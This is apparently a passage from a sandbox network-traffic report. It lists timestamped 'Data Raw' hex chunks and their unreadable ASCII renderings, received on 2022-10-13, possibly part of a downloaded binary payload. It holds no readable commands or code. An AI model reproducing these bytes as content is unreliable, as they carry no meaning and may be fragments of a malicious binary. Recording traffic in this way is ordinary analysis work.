f5 34 00 5d df 89 36 70 0c 8b 49 a9 4c 73 18 66 e1 fc 2d 27 7e c9 90 a7 7a 8e fc 6e 7b 3e d1 d0 36 31 ca 2e a0 9c a7 d5 2e 5d 59 96 ec 2e 88 fe e0 22 d1 dc cc 5c 09 d1 c1 21 64 fc 2e
                                                                                                                Data Ascii: i]+3@. R)7u#K,.l"b9jGEB/UGjFnARulCp/!mn6XJ#/?gc36ksI<1J8H*+b46>.Qz~XOC{c/Ek;2SRVHP4]6pILsf-'~zn{>61..]Y."\!d.
                                                                                                                2022-10-13 11:07:30 UTC45INData Raw: 3b 0b 44 4a 27 be 5b 90 bc 9f 8f 8e 25 06 c5 66 f7 74 76 31 2f 39 ff 52 76 e4 98 38 6a 1a b1 c7 8e 44 d0 82 4f 42 d8 2f 62 19 38 bc 3a 6a 4e 67 e3 2d ef d6 b6 7f 95 aa b1 ba fd 75 30 f1 32 6a 6a 83 28 37 46 82 2e 4d 73 ad ea d3 61 31 33 bd f7 7e 63 a9 15 a0 7a 46 4d ae 54 67 b1 8b 15 51 e5 31 ea 80 2c 93 63 cd 95 11 52 5f 8b c2 c4 23 13 6a e6 a5 43 3d 70 ef 73 9f ac fe ff ff 6f 5a f8 cf d5 44 0b 84 a3 55 c5 b3 9a 77 2a 4d 2b 9e f7 d5 01 75 93 9c 55 7f 48 8f 96 55 12 d2 63 4e 55 ac 6d 8f 01 2a 83 74 ce 5d aa 06 00 b9 dc d5 de 83 f2 b2 55 dd d0 a4 1d 2a 2e 21 d5 44 aa 43 51 cb 90 d5 eb b1 cf 10 2a bf d7 c2 7b aa f5 da de 71 aa 04 b8 32 a9 aa 96 67 de e6 d5 ad c0 41 6d c3 fd a1 38 d0 51 19 a4 39 d1 4a b4 22 c6 2e dc 88 30 35 d1 a1 8b 95 3c d1 cf 71 36 c0 2e
                                                                                                                Data Ascii: ;DJ'[%ftv1/9Rv8jDOB/b8:jNg-u02jj(7F.Msa13~czFMTgQ1,cR_#jC=psoZDUw*M+uUHUcNUm*t]U*.!DCQ*{q2gAm8Q9J".05<q6.
                                                                                                                2022-10-13 11:07:30 UTC46INData Raw: c1 bb 59 aa ab a5 cc d8 d5 4b 06 87 b6 55 a8 f5 d1 19 2a 13 14 a0 40 aa d6 a4 be 94 d5 2e 64 ba 14 2a 12 52 b7 7f aa 08 0d 3f 7f c3 72 7f 83 aa 76 2a 7e 2a 38 2f 79 10 a3 61 7c dd d3 77 2a d9 1e d6 10 5a 9b 86 50 18 f8 83 33 5c aa 5e b7 aa 9f b3 04 af b7 b6 c0 12 32 cc da 63 26 48 9f 7f 46 86 9b 4a 05 d8 a6 cf 42 00 2f 38 46 b1 6e a6 61 b4 45 ad 72 2a 40 26 a8 15 5a a3 e6 2e 1d f8 e3 3b 22 af 5e bf b2 e1 b6 04 b7 d7 c8 c5 12 52 72 c3 aa 85 24 e3 ba d7 53 92 c0 d8 bd 81 7d 86 75 d2 f9 95 c5 87 bf 53 f9 e2 0c 16 fd c5 e2 7a ce 8b 61 3a f7 e7 13 0c 1d 78 6c 86 9c c5 dd b7 88 65 3a 51 09 72 3b 1d 42 4a 7c 86 c5 29 e1 f4 f0 e2 9e 64 3a c6 e2 32 f6 f6 7b 3a a3 d3 77 09 1d 60 ea d9 35 1d 86 22 af 91 c5 1b 63 37 fc e2 fc b0 a2 6c 3a 01 cb ac 95 c5 2d 25 56 cb e2
                                                                                                                Data Ascii: YKU*@.d*R?rv*~*8/ya|w*ZP3\^2c&HFJB/8FnaEr*@&Z.;"^Rr$S}uSza:xle:Qr;BJ|)d:2{:w`5"c7l:-%V
                                                                                                                2022-10-13 11:07:30 UTC48INData Raw: 60 a9 9f 1a b5 fe 14 5b 4d 32 98 20 aa 72 bf 1e bf cd 7b b8 3c 0d 16 39 58 22 71 3e 04 3e 3e 1a 46 be ad 14 d6 ae 72 56 00 8e 6b fd f4 62 a8 3c 04 5a 83 c3 d5 2c 60 bb bc 43 72 e7 ff 55 9b 6c 35 23 1a 54 e2 de 55 f4 fe ff ff ff 7d 18 db e3 0d a9 b3 4b ff ff ff ff 5e 14 ad 72 0d 0c e1 c9 fb f1 72 5e 55 f8 a1 0f f6 bb dd 4a 4e 0b 00 00 00 00 0b 14 5a 42 17 96 3e cd 7b 4c a8 ca f8 f3 93 37 40 0b fe ff ff ff 09 da 31 c4 d7 f5 71 a5 b2 ef b3 01 54 4d bb 22 73 33 c4 b4 18 48 32 44 b2 15 2c a4 b2 d4 03 ab cb bb f4 b2 dc 54 cd d5 d7 3d a9 32 04 8d 06 cf bb 60 3d ec c8 3b 6f 97 8b 58 4d 93 91 f4 a4 b2 9b 3f 84 55 4d 27 46 f6 32 c4 e0 b4 cd 33 44 fe 49 a9 a5 b2 48 3f 2e ca bb d8 56 59 55 cd 31 6f e8 65 ba 2f 5b 3c ff 29 22 3a a1 4e 0c 07 5a 6e 7f 46 b3 08 39 ed b5
                                                                                                                Data Ascii: `[M2 r{<9X"q>>>FrVkb<Z,`CrUl5#TU}K^rr^UJNZB>{L7@1qTM"s3H2D,T=2`=;oXM?UM'F23DIH?.VYU1oe/[<)":NZnF9
                                                                                                                2022-10-13 11:07:30 UTC49INData Raw: a4 fd 4b 0b 32 ea 8b 10 eb 09 d1 6f 49 0f da 8c 53 47 0f 9b b4 55 96 39 25 1a ef aa 33 0e 8e ba 79 29 db 84 79 ba aa 3f 6c c1 02 05 6a 05 2b 6e fa 55 f2 c9 8c cb 7a e9 64 21 da be fb 87 44 04 fa c6 59 9a ed 09 c3 c1 84 89 aa b0 25 e6 1b 3f 1a 3f 7a 11 14 8e 42 81 0b c1 84 a1 62 88 25 6c 01 c2 27 70 05 bb fe d8 4f f2 b9 fc e9 60 e9 7c 39 f8 a4 fb ef 2c 57 f6 d1 5d 94 82 d3 26 d3 ba 43 0b 10 cd 9f 54 0b 20 d6 e2 94 f4 34 20 3b 5a 0b af 0c ce 4b 0b 1c 87 8a 46 0b 63 65 1f 85 f4 9d 52 a5 a8 f4 3a 3a 1e 54 0b 43 be a2 5b 0b d3 7b ae ad f4 cc 2d ac b3 f4 62 2b 89 a4 f4 be c0 f4 64 0b 56 de 2d aa f4 25 1a d8 bb f4 62 41 9c b6 f4 e9 3b 09 75 0b f3 aa 4a 43 0b d9 12 ea 10 eb 09 d1 6f 4a 2f b9 4c 19 0c fe 03 4b c0 03 68 79 c3 80 c5 0c da b0 a4 67 9e 4f 1a 16 53 94
                                                                                                                Data Ascii: K2oISGU9%3y)y?lj+nUzd!DY%??zBb%l'pO`|9,W]&CT 4 ;ZKFceR::TC[{-b+dV-%bA;uJCoJ/LKhygOS
                                                                                                                2022-10-13 11:07:30 UTC50INData Raw: 28 d3 53 3d 15 bf 6c 8e 5c fc 13 16 c8 fe ff ff ff 81 8c 2b a4 82 b8 64 13 3c a3 d1 b1 50 df 41 2e 8c 66 38 4a 67 ad 18 a8 c6 c4 ea 88 b0 7b a3 ef 69 e3 37 01 00 00 00 82 f7 e1 5b 57 2d d5 da 5b 5e 6b 8b 44 74 6b e6 73 c9 a1 85 00 8f c2 59 b4 6e 2d 96 98 15 92 32 5a db fb 11 eb 0d d7 de 5b 45 7f 6a 4e 79 0c a6 8d 82 f2 aa 6d fe d9 8f 3e ec fc a0 8b ee 85 96 36 66 c3 e8 b0 c1 3a ce 8e d2 21 3a cf 61 bf bf a6 08 94 5e 3a 03 7c 4d 21 1b 56 4e 79 56 ac 59 82 2b 55 8d 4e 54 00 b3 c2 f3 0b 80 76 e9 f7 4c 8c 7c ce 72 0d 62 a5 a5 97 5c a2 02 68 bf 01 00 00 00 7a 0e 86 f2 3c c7 27 81 b2 b4 dc 1c 7b ad 18 98 b9 85 f2 de 98 a7 87 92 4e 79 90 84 b2 a6 ac ca 77 cd 81 f7 fb 8c b2 b6 2c 82 7b 0d 5f 9a 08 7b 0d f9 21 f4 88 12 98 71 34 73 0d 4e 85 3c 74 4d 8e ce 07 8e 52
                                                                                                                Data Ascii: (S=l\+d<PA.f8Jg{i7[W-[^kDtksYn-2Z[EjNym>6f:!:a^:|M!VNyVY+UNTvL|rb\hz<'{Nyw,{_{!q4sN<tMR
                                                                                                                2022-10-13 11:07:30 UTC52INData Raw: 1f 6a 17 e9 85 ed 84 a6 0a 6b 3e 93 06 0c d0 13 df 6e a3 ea 93 06 6d 75 65 19 91 2e 2b 4a 34 7a be 5d ce a1 5d e9 d4 72 d8 3d a5 56 b9 b6 54 ff ff ff 0f 9a bb fa bb e9 e9 e8 de 7a b6 0f 24 91 99 b1 8d 0a 8c 78 73 e6 6e ea e2 b2 54 00 00 00 f0 57 f7 96 25 0d c5 c1 7f 42 2a d3 e8 6e 9f e7 72 2c 91 e7 1d b5 34 ff 47 65 55 2d 8b 1c 37 cc ee 46 87 16 b4 69 d3 db 24 c1 b0 19 43 9c 40 1c 12 d1 4d 03 bf 9c c4 40 19 e7 2e 4e c4 23 ec dd 01 ae 2c 13 18 1b fb 57 e3 0c ee 2e 18 53 6a 8b fe 47 45 55 04 6c 0c 49 58 05 c5 31 ac 1a 15 bb 7c 8f b1 18 dd 6e ea 33 f5 57 f9 81 73 93 b7 3a cf 45 a1 d7 2e 22 91 0e 0a c1 7f 41 dd f2 c6 6e 29 9d 63 47 a2 a5 9e 33 80 d6 e6 34 0b 91 0f 15 cf 3d 69 d2 c4 2a 4e 8b ac a1 26 60 85 ce eb 01 1e 97 9a a3 5c 59 e3 be c0 2a f0 48 00 e9 f7
                                                                                                                Data Ascii: jk>nmue.+J4z]]r=VTz$xsnTW%B*nr,4GeU-7Fi$C@M@.N#,W.SjGEUlIX1|n3Ws:E."An)cG34=i*N&`\Y*H
                                                                                                                2022-10-13 11:07:30 UTC53INData Raw: 57 f7 89 00 43 40 cd 46 3c 79 3f 7e d2 d5 35 3b 54 89 0c d3 9a 14 2a c1 12 4f 86 f3 38 eb 90 12 bb 88 c8 5d 9a 09 17 a4 2d 30 24 2f 96 ec ff ff ff df dc a2 ee 95 1a 96 ae 50 15 c0 0f cd eb 32 cb bc ff 8f 0f 54 69 07 ff ff ff ff 3a 62 4e ea b8 a5 20 26 32 0f d5 74 ea a1 92 ac 63 82 7c 79 0f 70 d2 1c 93 f8 00 00 00 00 78 f5 04 6a b6 28 b5 4b 4a 23 d0 dc 1a 0d 6f df 31 ec 43 97 db 06 cb b0 8b c3 d9 03 35 44 7b 0f 89 15 e5 ce 41 2c bb e8 bb 94 95 a6 10 f8 cf 10 79 78 77 6b 64 50 7e f4 6a dd 47 0b 19 6a fd 08 3d ff 44 ef 75 d8 75 cf 4c c6 89 6a 89 67 17 74 6a 8d 67 46 8c 00 84 9f 1b d2 95 31 41 7b b7 c5 b9 9b 75 28 6a e5 a5 45 b5 63 0d f6 47 93 95 b0 1a 75 ab 46 c9 14 cf 5f 15 02 c2 0a a2 49 8f 9e 55 ea 29 6a 87 ff 8f 30 3b 6c 53 fe ff ff 5f 1c e2 ab 55 22 54
                                                                                                                Data Ascii: WC@F<y?~5;T*O8]-0$/P2Ti:bN &2tc|ypxj(KJ#o1C5D{A,yxwkdP~jGj=DuuLjgtjgF1A{u(jEcGuF_IU)j0;lS_U"T
                                                                                                                2022-10-13 11:07:30 UTC54INData Raw: 46 23 69 54 d7 46 e8 3c 31 d4 47 61 e1 f3 07 17 00 00 00 2d e0 1f 00 64 ba f9 d9 f6 d3 27 06 b8 35 70 9c 7f 21 65 cf e7 b8 be 59 75 42 c3 7f 75 6d 8b 4b 52 b1 ae 1b 34 f9 4b 63 fb 13 81 51 59 59 51 88 b6 2a 32 09 93 bb fb cf c5 bd 8a ec b6 f2 4b 63 79 0f da fd 96 1b 89 f9 ef 83 c7 f9 fc 37 98 36 6a 6e fe 3f 09 81 3b e6 93 a6 a4 88 d9 f5 14 be d7 fc 7e 46 45 74 ee b7 b5 ef a1 a2 4d 2f 01 81 42 c9 a0 52 ed 52 2b 26 fb 39 d5 e7 7e d5 8f 7c 4a 60 73 39 7f 0d 80 51 ab 4e df f6 d2 c5 b5 c2 ed 88 d9 d0 05 d0 3c 38 ba f7 e5 fd 70 5f ca fe e1 db 7b de ca af 4a ad fa 87 84 31 0a 7b 63 7a 54 1e ec 1d cf b9 1f 71 9b cb f4 6f 77 6b 1b 60 e7 e7 b6 26 9a 59 59 6e 46 b4 dd 08 a9 52 f2 f7 c4 2c fb e4 f7 2c 71 57 2f dc d1 04 4a 11 fc 76 0e 0d 16 29 0b 3e 5f 70 f7 7e 29 aa
                                                                                                                Data Ascii: F#iTF<1Ga-d'5p!eYuBumKR4KcQYYQ*2Kcy76jn?;~FEtM/BRR+&9~|J`s9QN<8p_{J1{czTqowk`&YYnFR,,qW/Jv)>_p~)
                                                                                                                2022-10-13 11:07:30 UTC58INData Raw: ff ff 64 87 51 cd 97 2e e0 30 c4 88 1c db 31 44 a6 f9 bf a7 b2 08 87 38 c8 bb 60 3e 4f 57 cd 29 b3 ae aa 32 60 c9 95 cc bb 14 71 7f cb 3b e3 7b 18 5b 4d 7f 5d 67 a7 b2 57 03 17 56 4d 1b 3a 65 31 c4 8c 90 5e 30 44 3a 5d 3a a6 b2 ac 53 bd c9 bb b4 8a ca 56 cd ed ff 2b ab 32 dc ad 10 cd bb 50 cc a0 d6 08 5b 5e da 21 08 a6 13 7e e5 73 38 ae ba b2 6c 1c 7b b9 39 f1 9a 83 2b 92 51 a8 c6 d1 54 2d 27 6d 6e 0f bc 90 d6 ae c1 54 d7 7e d4 e0 14 92 2c 98 0a 8e fe 56 d4 99 e4 ef 4f f6 8d a5 fa 1e 69 e5 26 bc a3 ad b2 b8 a8 76 ae 39 5c c6 8e 3c 92 b4 7c cb c6 54 e1 db 60 79 0f 80 2c db b9 c1 88 4b 73 c3 e0 40 f9 4a 22 84 fb 73 1b b7 f2 77 5e ae ed ed ff fa 6f 8c d5 6e a8 28 84 79 14 31 cf 3f ba 3b 52 f2 99 42 6f 95 bb da e9 2d ed 2a 9e a4 93 fa 00 a1 f2 6e f2 c1 45 27
                                                                                                                Data Ascii: dQ.01D8`>OW)2`q;{[M]gWVM:e1^0D:]:SV+2P[^!~s8l{9+QT-'mnT~,VOi&v9\<|T`y,Ks@J"sw^on(y1?;RBo-*nE'
                                                                                                                2022-10-13 11:07:30 UTC63INData Raw: 7f 07 1d 3b 30 e9 c0 bf 68 e6 18 ec c6 67 2a 40 01 00 10 2b e8 15 72 c5 ed 57 af 41 01 1a 4a 16 1b 1d 34 10 6a 26 3f 52 c1 1d 6f ef e2 67 be c6 17 2b 1d 17 c3 bc 25 dc 21 34 94 c5 f4 9b 79 d2 1d 90 7e 7d a2 c9 82 40 1d 96 a4 99 c8 2d 9e 37 85 56 35 1b 7c ff e2 ff 88 e3 c8 13 0f 42 2e 40 01 00 00 01 91 4c 61 3a eb af 93 8f c5 fa a2 12 fd e2 11 db bc c1 e2 b7 93 ca 65 3a aa f2 52 08 1d 6d e9 c7 98 c5 58 8a c9 61 3a 6c ac 33 3f 1d e7 07 3d 82 c5 64 7c b5 f4 e2 03 11 7b c2 e2 47 bb b7 7f 3a ee 86 36 0d 1d 35 07 98 31 1d 6b 47 ee 95 c5 7e be 76 f8 e2 21 4d e3 68 3a fc fe ed 91 c5 18 1b ca b1 20 91 c4 65 65 5c 14 06 b8 f4 f7 e0 f3 a9 f4 80 8b b7 a4 f4 3f c9 22 67 0b 3d e6 98 4a 0b 5e 2e 23 b6 f4 7f fa 9f b9 f4 e3 d7 93 4f 0b 78 b1 91 51 0b ee 97 b4 46 0b 7a 8c
                                                                                                                Data Ascii: ;0hg*@+rWAJ4j&?Rog+%!4y~}@-7V5|B.@La:e:RmXa:l3?=d|{G:651kG~v!Mh: ee\?"g=J^.#OxQFz
                                                                                                                2022-10-13 11:07:30 UTC64INData Raw: 47 0b c6 86 f6 10 eb 09 d1 6f d7 c8 a8 cc ee ee 56 1e 4b b2 f7 5b 76 8e 9f 5c 41 a3 84 64 a7 c2 47 6c 7c bf 6d 12 05 2e 6b 92 2d f2 bc f9 a3 02 e9 51 14 b2 c6 fb b2 71 6c 82 c6 f4 37 85 71 c3 64 21 e1 d2 b0 00 c3 73 47 1a 62 27 79 6c 8e ef 2c 63 b9 84 04 c7 e0 5d 6c 3c ff 4f 08 05 b6 f3 b0 37 f2 04 41 81 18 e9 d1 94 90 dc fb b2 71 4e 98 c6 2c ef a7 ca a6 2f bc 17 dd ea 3c 37 5f d1 44 f6 97 bf d1 87 c2 fa a6 2e cc 3e 5d a1 d1 2c a1 93 a7 2e 9f 2f 17 aa 2e a1 a7 ff a8 2e 45 95 04 81 2e 79 2d fc 5f 2e 31 02 94 5a d1 55 7b dc b0 2e e6 18 96 a2 2e c1 3a 36 42 2e 8b 3e 5b 5b d1 d0 fa fc 5c 2e f7 2d 32 5a d1 93 83 b6 57 d1 93 a3 5e 55 d1 01 21 59 44 d1 f8 cb d6 3f fc ff ff ff c9 a8 4e 5f a6 8c 82 b8 91 81 3c b4 27 cc b9 df 5f 11 0d 86 92 80 f9 77 b9 27 e9 bc 2d
                                                                                                                Data Ascii: GoVK[v\AdGl|m.k-Qql7qd!sGb'yl,c]l<O7AqN,/<7_D.>],./..E.y-_.1ZU{..:6B.>[[\.-2ZW^U!YD?N_<'_w'-
                                                                                                                2022-10-13 11:07:30 UTC68INData Raw: 3e 19 87 1b f6 90 dc 0d 39 e1 bb ed ff c6 4c fa ec 86 1b 5f 5d 07 80 1b 7a 84 30 07 39 15 6b 73 7c e4 20 35 be 31 ed 68 7b b4 d4 1c 85 17 aa ff fe ff ff ff a5 14 7d 8d 99 8a c6 c6 dc 75 dd 3f a4 d4 92 8f 3d a4 b1 a5 b2 75 ed b0 a1 7e d2 ea 06 99 8c 92 0a 5e 74 e6 f0 22 e8 0c 87 d4 27 02 3c d0 2d 8c d2 91 7d 93 ea 09 66 c0 e5 dc cb 90 06 c8 fe ff ff ff 62 1b 3b a4 d0 fc ab 95 d2 3d 6f d3 0a 0f 6e be 18 a3 c9 84 fa 37 01 00 00 00 99 8a 7a 4d cb ad 8e 8f f1 57 d6 3a a4 19 01 0e 39 a4 29 d2 47 7f 6d cf 49 ad 88 f2 05 3b 08 fc f1 53 6d 10 89 4d f9 0e 3c 5e f0 7a 0d 46 bc 8d c6 14 16 19 84 f2 ec 4f 6e 19 0f fa 05 c2 5b 08 3e 8b 40 79 c1 6d f1 6e a3 82 f3 95 40 01 00 00 00 b2 da 79 2d a6 1b 41 60 a3 e1 e3 9e 40 01 00 00 00 08 b3 81 52 ef a3 ab 7b ad 03 af 0e 85
                                                                                                                Data Ascii: >9L_]z09ks| 51h{}u?=u~^t"'<-}fb;=on7zMW:9)GmI;SmM<^zFOn[>@ymn@y-A`@R{
                                                                                                                2022-10-13 11:07:30 UTC72INData Raw: 1d af 8c 1b 00 5d 95 d9 0f fb a3 6a 89 fd 9a 65 95 2f 87 19 42 95 29 93 82 5e 95 c8 64 6e a5 6a 93 b9 75 62 95 c2 64 4a 48 95 82 90 53 53 95 18 ac 0c 93 6a ae c8 03 a4 6a aa b8 94 b4 6a f7 5b a3 4b 95 cf 81 c2 8d 6a d7 0b 41 aa 6a 8d 3f da b6 6a 28 98 36 4d 95 4d 6d 2d 8a 6a e2 40 12 a0 6a ac 12 fa a0 21 31 d6 a5 6e 1d 5d 80 10 ad 06 a5 bb 1d da 5c 7c 8b 34 a2 00 02 7c a6 13 43 f6 43 f4 d3 fd 5b 20 49 15 0d 00 61 01 6d 1e 64 42 c0 37 52 97 29 8b d4 92 cc b3 83 0e df 01 d3 4c 3f 38 9d 81 1b ad d3 95 ba 16 da 44 54 8a 3f a2 3d da 7d ad 13 73 76 42 ff d3 68 2b 21 42 15 58 90 60 0a 6d 4e b4 43 cb 37 4f f7 06 3a 15 a9 18 c2 76 6a 66 bd 4a 3a 66 4b 89 92 cf 15 07 f3 10 b2 ce dd 3f d5 94 95 01 99 a2 71 2b a2 00 96 ef 15 a6 d6 20 8b f5 ab 07 d9 5e 6a bd 94 40 8b
                                                                                                                Data Ascii: ]je/B)^dnjubdJHSSjjj[KjAj?j(6MMm-j@j!1n]\|4|CC[ IamdB7R)L?8DT?=}svBh+!BX`mNC7O:vjfJ:fK?q+ ^j@
                                                                                                                2022-10-13 11:07:30 UTC76INData Raw: 51 48 ff 9f 71 b9 c0 77 01 48 8e 97 1a f5 05 2e b8 3e 0a df 52 74 17 a9 26 df c6 ad da 25 5f c9 c8 cd d8 f7 fe 97 6a 9d 4f d6 92 eb d9 df de e4 7b be 3b 51 a0 e6 c8 1f a4 d3 96 1a e8 30 9a de e7 5f c0 0b 18 d2 fe 1c f5 a5 64 d1 c6 ab 81 9d 43 2f d9 d7 3a 86 d9 fe 2b fd c4 d6 42 b1 42 92 ba be 48 ed 16 9b b8 f6 5e e6 c6 6a d5 22 c6 4c 54 00 00 00 08 88 b8 31 72 8f 83 3a 73 b7 fe 27 83 5a 0b dc 3d 88 81 58 a0 3a eb ff 79 bf ab ff ff ff ff 15 18 61 85 4f 16 68 87 55 7c 3d 0e ba ed 2b 18 83 7b 10 e3 6c 54 b8 7a 6e e0 fe fd 3e 8d e4 0c 65 47 f5 8d a2 db 47 d5 77 a9 09 40 f7 5e 43 2e e3 92 f3 cb bf fe 27 73 7e 46 71 d7 44 7e 6c de 4a 23 d8 c9 cf bf e4 dd 5c aa 72 ae a5 45 14 b9 7a 6e fb 67 57 c5 ba bf 04 cb 98 8a c2 cd cc ff c0 39 46 c2 66 4a 63 c1 43 2a cb 53
                                                                                                                Data Ascii: QHqwH.>Rt&%_jO{;Q0_dC/:+BBH^j"LT1r:s'Z=X:yaOhU|=+{lTzn>eGGw@^C.'s~FqD~lJ#\rEzngW9FfJcC*S
                                                                                                                2022-10-13 11:07:30 UTC80INData Raw: aa 9a 18 26 c0 04 48 93 26 c0 e5 7c b7 da 3f e6 eb 44 d7 3f 00 04 2b 24 c0 94 7d 83 28 c0 c0 93 e3 d4 3f 0b 38 4f d1 3f a9 dc 18 28 c0 68 e8 4d 2c c0 4b a8 64 d5 3f 7f e9 7f 40 8e e6 b7 2a b9 85 3a 9a 20 ba 5b 5e 07 d2 b7 1e 55 bf d6 46 3c aa a1 2b 4a a2 1c 57 28 b9 35 5f c6 2b b9 a6 a4 1c db b6 f7 f4 92 24 49 ce 28 37 2f b9 13 02 91 d5 b7 1a 12 8d d6 46 91 ee a0 dc 45 ff 5a 3d 2e 48 a2 09 85 2a b9 28 3e 9b d7 b5 4e 10 6d d4 46 21 2b fc d7 46 ca 16 6a 2d 4b 53 ad 0b f8 17 00 00 00 07 5a c7 ff a6 79 c8 28 08 23 a7 bd 0b 14 66 69 69 82 55 46 9b a8 66 74 86 72 80 28 fa b2 9e db 26 e9 db aa c5 42 58 5c bb 19 b8 28 2d f8 9d e8 f4 95 62 66 c1 e5 54 bb 22 5b 62 24 08 59 9a a8 b1 6f 16 41 c3 87 6f c6 a4 55 44 7d 18 74 21 fb 29 18 ce ed 78 66 cb e9 ac 44 28 f0 16
                                                                                                                Data Ascii: &H&|?D?+$}(?8O?(hM,Kd?@*: [^UF<+JW(5_+$I(7/FEZ=.H*(>NmF!+Fj-KSZy(#fiiUFftr(&BX\(-bfT"[b$YoAoUD}t!)xfD(
                                                                                                                2022-10-13 11:07:30 UTC84INData Raw: e8 ff ff ff 27 93 23 40 36 c6 eb 2e b9 0d 58 ca 06 07 ef 27 d5 47 4c ab 76 2b c0 66 f5 55 d5 b4 4d 0e d0 2f c0 cb 08 43 d2 b6 91 0e c8 d3 3f 90 5b cb 2e 4b e8 f0 e5 21 c0 64 b6 12 cd b6 03 86 e0 c3 3f 45 c9 8f 30 c0 67 78 27 3c c0 e3 3e 47 c0 3f a0 bd eb c5 3f 02 11 bc 3c c0 b5 65 e9 38 c0 e2 51 98 c4 3f fd 89 81 3d c0 2f fb 0a 3d c0 50 c7 2e c1 3f 57 68 dd cc 3f a9 1f b2 3f c0 bd be 1a 33 c0 09 48 7a cf 3f f2 50 21 34 c0 02 ee 63 6d 2e c1 10 a5 15 9b 87 d7 2e 1b 81 cf 18 8e 1b ed 98 d5 c1 16 e4 e6 3e 99 53 ca ca 01 cb 93 d9 6f 62 76 55 04 dc 23 3e 2d 2a e0 00 ff 77 5e 6b 6b b4 94 26 08 f1 bc 4e 6e 15 91 73 7f 09 69 c3 24 ed 52 b1 f8 29 9a e8 08 c8 00 e2 5c 6e 3f 92 53 4f ba 00 c0 93 71 d1 32 9e 8a b8 bb 29 2a aa a9 84 8e 1e aa 46 3f d8 b1 d5 45 f3 46 4e
                                                                                                                Data Ascii: '#@6.X'GLv+fUM/C?[.K!d?E0gx'<>G??<e8Q?=/=P.?Wh??3Hz?P!4cm..>SobvU#>-*w^kk&Nnsi$R)\n?SOq2)*F?EFN
                                                                                                                2022-10-13 11:07:30 UTC88INData Raw: 83 55 a7 94 33 89 55 62 c6 df 51 55 b8 79 33 1e 2a 8f 70 72 42 aa 92 e4 05 c3 d5 c6 cf 4e ad 55 15 64 18 02 2a 42 05 69 5b aa e3 8d 77 8f d5 8f bd 73 0f 2a 67 43 7e 64 aa 01 0e 62 6e aa 68 bc 8e b6 aa f2 23 62 f9 d5 15 aa 23 a5 55 84 b7 d4 69 c3 7f 2a fb 71 89 47 b9 e3 80 56 c3 eb b4 12 38 5b d0 b9 65 27 02 e0 90 1d e3 f4 17 02 ac 75 40 28 50 6c 8b ad 4b ed aa f6 0e 0a a5 d2 40 5a 29 64 88 84 f1 42 2f 6b ec a2 d8 27 b1 a4 9f b8 e8 80 06 63 ea bf 12 35 63 d1 b2 65 22 d2 e1 9b 1d fe 9c 16 09 ac d0 90 29 5b 6c f6 e5 4a e6 aa c6 6e 0b ae d2 e0 a2 fc 53 2a dc 53 b7 c2 cf c1 d0 62 13 ff ff ff 8f 08 23 fa 52 2f 32 6f 2c 19 d8 f8 d2 ff 70 5c 04 2d 1c bf 33 fa 95 89 cb 80 ce 10 f7 9e 69 6a 6d 80 c0 f8 ee 16 13 e1 95 a4 4e 5a 38 bb 5c 73 b4 6a 59 27 bc 8a 89 07 7c
                                                                                                                Data Ascii: U3UbQUy3*prBNUd*Bi[ws*gC~dbnh#b#Ui*qGV8[e'u@(PlK@Z)dB/k'c5ce")[lJnS*Sb#R/2o,p\-3ijmNZ8\sjY'|
                                                                                                                2022-10-13 11:07:30 UTC93INData Raw: 84 f2 e7 16 12 84 f2 7a 5d ee 77 ed d8 25 2e 8c f2 51 59 26 8b b2 0d 82 1d 71 ad 09 46 b8 8f f2 0f b6 a6 8d 92 64 5f 91 8e b2 1c 32 cb 7d cd 13 a7 8a 2e bb 68 63 22 b9 bf e8 99 52 25 00 ba 4c 48 8b 25 9d 1d 5b 0b 9c e9 a1 54 0b 88 34 ad a2 f4 a3 22 af bc f4 25 b4 8a ab f4 15 37 f7 6b 0b d9 d9 2e a5 f4 ea 8d db b4 f4 e5 f6 9f b9 f4 1a 04 0a 7a 0b f8 3b b0 57 0b 43 73 0b ab f4 32 87 b7 a4 f4 aa c2 bb 52 0b 5d c4 b9 4c 0b 8b c2 9c 5b 0b 6b 51 e1 9b f4 a7 8f 38 55 0b 70 89 6b 50 0b 5c b3 46 10 eb 09 d1 6f 91 bc e0 cc 16 34 c7 a3 b4 cf 8a 19 91 79 6f e5 1e 6c ce 14 e3 79 6b ce d2 4f 1f 00 7f bb 9e 9c b4 76 34 97 6b ce 9d 0f 5b 61 4e 01 12 c2 ff df a4 6c b3 b4 0f df c8 ff e8 6c 99 4b 4b c2 31 56 4d d6 6d 3a c3 53 4b 98 5f 57 79 82 e8 19 da 63 e0 e5 93 d6 56 8e
                                                                                                                Data Ascii: z]w%.QY&qFd_2}.hc"R%LH%[T4"%7k.z;WCs2R]L[kQ8UpkP\Fo4yolykOv4k[aNllKK1VMm:SK_WycV
                                                                                                                2022-10-13 11:07:30 UTC96INData Raw: 00 0f 9b 5d ea bd 04 c2 c3 cd 5c 1f 4d 15 52 bf c8 f4 5c 43 f9 43 00 98 a1 37 0e 9d e2 a3 15 23 70 5d a6 b5 bc bd e8 8f de 1c 75 07 ff ff ff ff 45 ad 1d 21 64 0d f6 80 95 93 a6 a7 a5 15 70 31 1e 44 4c 16 76 9a ff 76 6f 46 48 e1 0e dd 95 c3 57 e9 44 4c df b7 d6 8f d9 78 72 07 ff ff ff ef 6b bd d9 89 6d bb 12 13 2b dd 73 55 b1 53 ea b7 d1 65 81 95 67 c1 51 06 cd 5b 38 21 6a d1 6a 5b 5c b3 13 e9 6a 00 fb 26 4b 97 b7 a1 04 6a 89 12 97 4d 4a 96 e1 c5 8f d2 85 63 07 ff ff ff af 0b 69 80 5d 75 88 aa fe 95 7a 69 3f 25 4a 38 93 0a 70 0c bd 94 f8 00 00 00 50 aa e3 af 15 fc e6 a9 8c b5 14 32 18 50 35 80 78 8f 52 a3 5b 57 6e 6a d1 1a e5 43 ea f8 5d 51 41 4a ea f7 8f ff f0 cf 6f b2 a2 cd 67 6a dc 72 07 ef b2 39 21 7f ea 8f 54 85 ac b3 cd 15 12 76 98 8d d1 ac 5d d9 eb
                                                                                                                Data Ascii: ]\MR\CC7#p]uE!dp1DLvvoFHWDLxrkm+sUSegQ[8!jj[\j&KjMJci]uzi?%J8pP2P5xR[WnjC]QAJogjr9!Tv]
